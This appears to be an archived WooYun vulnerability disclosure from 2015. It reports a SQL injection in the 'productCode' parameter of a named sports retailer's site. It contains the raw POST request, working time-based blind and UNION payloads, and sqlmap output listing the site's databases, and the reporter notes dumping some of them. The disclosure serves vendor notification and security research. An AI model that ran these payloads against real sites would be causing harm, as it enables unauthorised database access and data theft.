乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-10: 细节已通知厂商并且等待厂商处理中 2015-07-13: 厂商已经确认,细节仅向厂商公开 2015-07-23: 细节向核心白帽子及相关领域专家公开 2015-08-02: 细节向普通白帽子公开 2015-08-12: 细节向实习白帽子公开 2015-08-27: 细节向公众公开
天地本不仁 万物为刍狗 【HD】 以团队之名 以个人之荣耀 共建网络安全
POST 数据包:
POST /XP001-Shopping/dialogSales.html HTTP/1.1X-Forwarded-For: 8.8.8.8'Content-Length: 67Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://team.epeaksport.com/Cookie: PHPSESSID=i532srvsrtg0ml6ui0icdfegc4Host: team.epeaksport.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*productCode=E42638H
参数 productCode 可注入
看了下权限
随便找了几个数据库 跑了下(epeak 这个数据库跑起来依然慢)
看了几个 也不知道有什么的库(好多数据量没跑出来)
数据量没跑出来 有点可惜
POST parameter 'productCode' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 112 HTTP(s) requests:---Parameter: productCode (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: productCode=E42638H' AND (SELECT * FROM (SELECT(SLEEP(5)))kUqy) AND 'Uttm'='Uttm Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: productCode=-8846' UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7871,0x53705a66686355414941,0x71707a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[18:16:23] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS: MySQL 5.0.12[18:16:23] [INFO] fetching database names[18:16:23] [INFO] the SQL query used returns 17 entries[18:16:23] [INFO] retrieved: information_schema[18:16:23] [INFO] retrieved: epeak[18:16:23] [INFO] retrieved: epeakanalyse[18:16:23] [INFO] retrieved: epeakassist[18:16:24] [INFO] retrieved: epeakmall[18:16:24] [INFO] retrieved: epeakmall_e[18:16:24] [INFO] retrieved: epeakmall_team[18:16:24] [INFO] retrieved: epeakmall_xf[18:16:24] [INFO] retrieved: epeakpdm[18:16:24] [INFO] retrieved: epeakpdm_e[18:16:25] [INFO] retrieved: epeakpdm_team[18:16:25] [INFO] retrieved: epeakpdm_xf[18:16:25] [INFO] retrieved: epeakuniform[18:16:25] [INFO] retrieved: epeakvip[18:16:25] [INFO] retrieved: mysql[18:16:25] [INFO] retrieved: performance_schemaavailable databases [16]:[*] epeak[*] epeakanalyse[*] epeakassist[*] epeakmall[*] epeakmall_e[*] epeakmall_team[*] epeakmall_xf[*] epeakpdm[*] epeakpdm_e[*] epeakpdm_team[*] epeakpdm_xf[*] epeakuniform[*] epeakvip[*] information_schema[*] mysql[*] performance_schema[18:16:26] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 9 times[18:16:26] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\team.epeaksport.com'[*] shutting down at 18:16:26
危害等级:中
漏洞Rank:10
确认时间:2015-07-13 09:45
谢谢
暂无